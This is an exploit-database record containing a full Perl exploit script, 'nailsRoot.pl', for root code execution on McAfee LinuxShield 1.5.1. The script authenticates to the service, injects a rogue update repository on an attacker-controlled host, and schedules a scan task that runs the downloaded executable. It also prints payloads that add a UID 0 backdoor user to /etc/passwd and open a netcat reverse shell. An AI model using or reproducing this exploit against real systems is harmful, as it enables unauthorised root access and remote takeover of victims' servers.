Description
McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion Remote Code Execution
{"lastseen": "2020-04-01T19:04:30", "references": [], "description": "\nMcAfee LinuxShield 1.5.1 - LocalRemote File Inclusion Remote Code Execution", "edition": 1, "reporter": "Nikolas Sotiriu", "exploitpack": {"type": "webapps", "platform": "linux"}, "published": "2010-08-27T00:00:00", "title": "McAfee LinuxShield 1.5.1 - LocalRemote File Inclusion Remote Code Execution", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-08-27T00:00:00", "id": "EXPLOITPACK:8ABEE41D6D37EDDDDE4E2879A2DF8C6F", "href": "", "viewCount": 2, "sourceData": "#!/usr/bin/perl\n\n##\n# Title: McAfee LinuxShield <= 1.5.1 Local/Remote Root Exploit\n# Name: nailsRoot.pl\n# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>\n# WARNING: This Exploit deletes the default Update Server\n#\n# Use it only for education or ethical pentesting! The author accepts \n# no liability for damage caused by this tool.\n# \n##\n\nuse strict;\nuse IO::Socket::SSL;\nuse Getopt::Std;\n\nmy %args;\nmy $ack;\nmy $timestamp;\n\ngetopt('h:p:u:v:e:a:g:', \\%args);\n\nmy $gen_exec = $args{g};\n\nif (defined $gen_exec) {\n\tgenEx($gen_exec);\n}\n\nmy $target_host = $args{h} || usage();\nmy $target_port = $args{p} || 65443;\nmy $nails_user = $args{u} || usage();\nmy $nails_pass = $args{v} || \"\";\nmy $exec_path = $args{e} || \"/opt/McAfee/cma/scratch/update/catalog.z\";\nmy $my_host = $args{a} || \"\";\n\nmy $range = 50000000;\nmy $minimum = 90000000;\n\nmy $randomtask = int(rand($range)) + $minimum;\n\nmy $pre=\"sconf ODS_99 \";\nmy $post=\"\\x0d\\x0a\";\n\nmy $setrepo1='db set 1 _table=repository status=1 siteList=<?xml\\ version=\"1.0\"\\ encoding=\"UTF-8\"?><ns:SiteLis'.\n 'ts\\ xmlns:ns=\"naSiteList\"\\ GlobalVersion=\"20030131003110\"\\ LocalVersion=\"20091209161903\"\\ Type=\"Clie'.\n 'nt\"><SiteList\\ Default=\"1\"\\ 
Name=\"SomeGUID\"><HttpSite\\ Type=\"repository\"\\ Name=\"EvilRepo\"\\ Order=\"1\"'.\n '\\ Server=\"';\n\nmy $setrepo2=':80\"\\ Enabled=\"1\"\\ Local=\"1\"><RelativePath>nai</RelativePath><UseAuth>0</UseAut'.\n 'h><UserName></UserName><Password\\ Encrypted=\"0\"/></HttpSite></SiteList></ns:SiteLists> _cmd=update';\n\nmy $setsite=\"task setsitelist\";\n\nmy $begin=\"begin\";\n\nmy$set=\"set \";\nmy $profile=\" nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60\".\n \" nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS\".\n \"_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.\".\n \"ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib nailsd.prof\".\n \"ile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so\".\n \" nailsd.profile.ODS_99.factoryInitT\".\n \"mo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.p\".\n \"rofile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nails\".\n \"d.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quaran\".\n \"tineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scan\".\n \"Children=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profil\".\n \"e.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=\".\n \"$exec_path\".\n \" nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.sl\".\n \"owScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.pat\".\n \"h=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all \".\n \"nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=\".\n 
\"Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.pri\".\n \"mary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeou\".\n \"t=Pass nailsd.profile.ODS_99.action.error=Block\";\n\nmy $commit=\"commit \";\n\nmy $setdb=\" _table=schedule taskName=$randomtask taskType=On-Demand taskInfo=profileName=ODS_99,\".\n \"paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 status=Stopped _cmd=insert\";\n\t#update _where= i_taskId=2\";\n\nmy $execupd=\"task nstart LinuxShield Update\";\nmy $execute=\"task nstart $randomtask\";\n\nbanner();\n\nif ($exec_path eq \"/opt/McAfee/cma/scratch/update/catalog.z\") {\n\tif ($my_host eq \"\") {\n\t\tusage();\n\t}\n\tstOne();\n}else{\n\tstTwo();\n}\n\nsub stOne {\n\tmy $reposock = IO::Socket::SSL->new(\n PeerAddr => $target_host,\n PeerPort => $target_port,\n Proto => 'tcp',\n );\n\n\tif (defined $reposock) {\n\t\tprint \"[*] Executing Stage One\\n\";\n\t\tprint \"-----------------------\\n\";\t\t\n\n $ack=<$reposock>;\n print $ack;\n\n print $reposock \"auth \".$nails_user.\" \".$nails_pass.$post;\n $ack=<$reposock>;\n if ($ack=~m/ERR authentication failure/){\n print \"[-] Authentication failed...\\n\";\n exit(1);\n }\n print $ack;\n sleep(1);\n\n print \"[+] Repo update: inject evil repo\\n\";\n print $reposock $setrepo1.$my_host.$setrepo2.$post;\n sleep(1);\n\n print \"[+] Repo Site update: update site task\\n\";\n print $reposock $setsite.$post;\n $ack=<$reposock>;\n print $ack;\n sleep(1);\n\n print \"[+] Execute AV Update: downloading evil code\\n\";\n print $reposock $execupd.$post;\n sleep(5); # Update needs a bit time\n\t\t$reposock->shutdown(1);\n\t\t\n\t}\n\tstTwo();\n}\n\nsub stTwo {\n my $sock = IO::Socket::SSL->new(\n PeerAddr => $target_host,\n PeerPort => $target_port,\n Proto => 'tcp',\n );\n\n\tif (defined $sock) {\n print \"\\n\\n[*] Executing Stage TWO\\n\";\n print 
\"-----------------------\\n\";\n\n\t\t$ack=<$sock>;\n\t\tprint $ack;\n\t\t\n\t\tprint $sock \"auth \".$nails_user.\" \".$nails_pass.$post;\n\t\t$ack=<$sock>;\n\t\tif ($ack=~m/ERR authentication failure/){\n\t\t\tprint \"[-] Authentication failed...\\n\";\n\t\t\texit(1);\n\t\t}\n\t\tprint $ack;\n\t\tsleep(1);\n\n\t\tprint $sock $pre.$begin.$post;\n\t\t$ack=<$sock>;\n\t\tprint $ack;\n\t\t\t$ack=~s/\\+OK //g;\n\t\t\t$timestamp=$ack;\n\t\t\t$timestamp=~ s/\\s+$//;\n\t\t\tprint \"[+] Timestamp: $timestamp\\n\";\n\t\tprint \"[+] Profile: Injecting evil Profile\\n\";\n\t\tprint $sock $pre.$set.$timestamp.$profile.$post;\n\t\tsleep(1);\n\n\t\tprint \"[+] Commit: Profile changes\\n\";\n\t\tprint $sock $pre.$commit.$timestamp.$post;\n\t\tsleep(1);\n\n\t\tprint \"[+] Schedule: Injecting evil task $randomtask\\n\";\n\t\tprint $sock \"db set \".$timestamp.$setdb.$post;\n\t\tsleep(1);\n\n\t\tprint \"[+] Excute: Task $randomtask\\n\";\n\t\tprint $sock $execute.$post;\n\t\t$sock->shutdown(1);\n\t\tprint \"[+] Done... Check whatever you did\\n\";\n\t} else {\n \t print \"[-] some troubles with connection: $!\\n\" ;\n\t}\n}\n\nsub usage {\n\n print \"\\n\";\n print \" nailsRoot.pl - McAfee LinuxShield local/remote Root Exploit\\n\";\n print \"===============================================================\\n\\n\";\n print \" Usage:\\n\";\n print \" $0 -h <target ip> -u <user> -v <pass> [-a <my host>|-e <executable>]\\n\";\n print \" Optional:\\n\";\n print \" -a <attacker host with httpd>\\n\";\n print \" -e <executable file on target host>\\n\";\n print \" -p <target port (default: 65443)>\\n\";\n print \" -g (1|2) <generat shell scripts to execute>\\n\";\n print \" 1 <UID 0 user add>\\n\";\n print \" 2 <reverse nc shell>\\n\";\n print \" Notes:\\n\";\n print \" -We can not handle arguments given to executable\\n\";\n print \" in the -e option.\\n\";\n print \" -To download your own evil executable, start a httpd\\n\";\n print \" and set the -a option. 
Create the directory <nai> in\\n\";\n print \" your wwwroot and rename your executable to <catalog.z>\\n\";\n print \" Author:\\n\";\n print \" Nikolas Sotiriu (lofi)\\n\";\n print \" url: www.sotiriu.de\\n\";\n print \" mail: lofi[at]sotiriu.de\\n\";\n print \"\\n\";\n\n\n exit(1);\n}\n\nsub genEx {\n my ($code)=@_;\n \n if ($code==1) {\n print STDERR << \"EOF\";\n\n============== UID 0 user add ==============\n\nCopy this lines to the catalog.z file.\n\nUSER=haxxor PASS=haxxorPass\n\n-------------- cut -------------- \n#!/bin/sh\necho haxxor:AzFQk89Xgpp8s:0:0::/:/bin/sh >> /etc/passwd\n-------------- /cut -------------- \n\nEOF\n \n } elsif ($code==2) {\n print STDERR << \"EOF\";\n\n============== reverse nc shell ==============\n\nCopy this lines to the catalog.z file.\n\n-------------- cut --------------\n#!/bin/sh\nnc -nv <yourip> 4444 -e /bin/sh\n-------------- /cut --------------\n\nEOF\n\n }\n\n\texit(1);\n\n}\n\nsub banner {\n\tprint STDERR << \"EOF\";\n--------------------------------------------------------------------------------\n nailsRoot.pl - McAfee LinuxShield local/remote Root Exploit\n--------------------------------------------------------------------------------\n \n 111 1111111 \n 11100 101 00110111001111 \n 11101 11 10 111 101 1001111111 \n 1101 11 00 10 11 11 111 1111111101 \n 10111 1 10 11 10 0 10 1 1 1 1111111011 \n 1111 1 1 10 0 01 01 01 1 1 111 1111011101 \n 1000 0 11 10 10 0 10 11 111 11111 11 1111 111100 \n 1111111111 01 10 10 11 01 0 11 11111111111 1 1111 11 \n 10111110 0 01 00 11 1110 11 10 11111111111 11 11111 11 111 \n 101111111 0 10 01 11 1 11 0 10 11 1111111111111111 1111110000111 \n 011111 0110 10 10 0 11 1 11 01 01 111111111111111 1 11110011001 \n 1011111 0110 10 11 1110 11 1 10 11111111111111111111 1 100 001 \n 1011111 0 10 10 01 1 0 1 11 1 111111111111111111111111 001101 \n 011111 0 0 0 11 0 1111 0 11 01111111111111111111111111 01 \n 1111111 01 01 111 1 1111 1 11 1111111111111111111111 1101 1111 \n 111 1111 10 0 111110 0111 0 
1 0111111111111111111111 11111 1111 \n 111 11111 1 11 1 1 1 111 11 11111111111111111111111110 1001 \n 111 1011111 1 11111111110111111111111111111111111111111 01 10111001 \n 11 1100 10110110 10001 11101111111111111111 10 111 11100 \n 111 00 1011101 00101 0 11111111111111111001 11 111101 \n 11 00 00 101 1000011 1011 1111 1111111000 1111111 0 \n 11 00 0 1011 100001 101000 1 1001 00001111 01 \n 01101 11111 1011 01100 0101 110 11 10 \n 10111 1 0 01 0000011 10 10 \n 10011 11100 1111 101 11 \n 1110 01 101011 1001100 \n 1111000011 1 111 \n 11000001111 \n 1 \n\nEOF\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645767482}}
{}